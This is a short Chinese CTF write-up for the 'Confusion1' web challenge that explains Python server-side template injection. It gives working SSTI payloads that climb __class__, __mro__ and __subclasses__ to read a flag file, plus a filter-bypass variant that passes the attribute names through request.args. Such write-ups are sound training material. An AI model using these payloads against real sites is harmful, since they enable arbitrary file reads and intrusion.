WEB:Confusion1

sleepywin2023-07-19 19:00

背景知识

SSTI漏洞

题目

根据网站图片和题目描述的提示,大象是php,蟒蛇是python,说明了这个网站是用python写的

在python中,比较常规的漏洞就是SSTI模板注入

没有思路,先点login和register页面看看

查看源代码

之前猜测是ssti漏洞,先验证

ssti常用注入

复制代码 
__class__() 返回对象的类
__base__()/__mro__() 返回类所继承的基类
__subclasses__() 返回继承类的所有子类

测试payload

复制代码 
{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}

被过滤了

替换payload为

复制代码 
{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

得到flag

参考学习链接:
【愚公系列】2023年05月 攻防世界-Web(Confusion1)_confusion1攻防世界_愚公搬代码的博客-CSDN博客 【攻防世界WEB】难度四星12分进阶题:Confusion1_wx617e2c956ef44的技术博客_51CTO博客

相关推荐
星河耀银海11 小时前
Java安全开发实战:从代码防护到架构安全
java·安全·架构
mCell12 小时前
Memo Code 安全设计:子进程、命令防护与权限审批的统一方案
安全·typescript·agent
漠月瑾-西安12 小时前
CVE-2025-55182漏洞解析:你的React项目安全吗?
前端·安全·react.js
liann11917 小时前
4.3.2_WEB——WEB后端语言——PHP
开发语言·前端·网络·安全·web安全·网络安全·php
乾元17 小时前
对抗性攻击:一张贴纸如何让自动驾驶视觉系统失效?
运维·网络·人工智能·安全·机器学习·自动驾驶
aaaffaewrerewrwer18 小时前
2026年好用的 AVIF 转 WebP 在线工具推荐(支持批量转换)
图像处理·安全
hacklf200821 小时前
数据库高安全—openGauss安全整体架构&安全认证
数据库·安全·架构
实时数据1 天前
渗透测试步骤 信息收集:收集目标系统的相关信息,例如域名、IP地址、开放端口和服务等
网络·安全·web安全
HwJack201 天前
HarmonyOS APP ArkTS开发中可选链运算符安全访问与性能优化小知识
安全·华为·harmonyos
pps-key1 天前
人工智能自我意识:理论框架、技术路径与哲学思辨
人工智能·计算机网络·安全·华为
热门推荐
01PHP Error: 常见错误及其解决方法02GitHub 镜像站点03openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05UV安装并设置国内源06Android Studio Panda 1 正式版来了:JDK 终于不用手动配了,内存泄漏也有原生方案了07配置 OpenClaw 使用 Ollama 本地模型08HTB 赛季10 - Pterodactyl - user09243 行 microGPT:把“训练 + 推理”拆到骨头里10全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)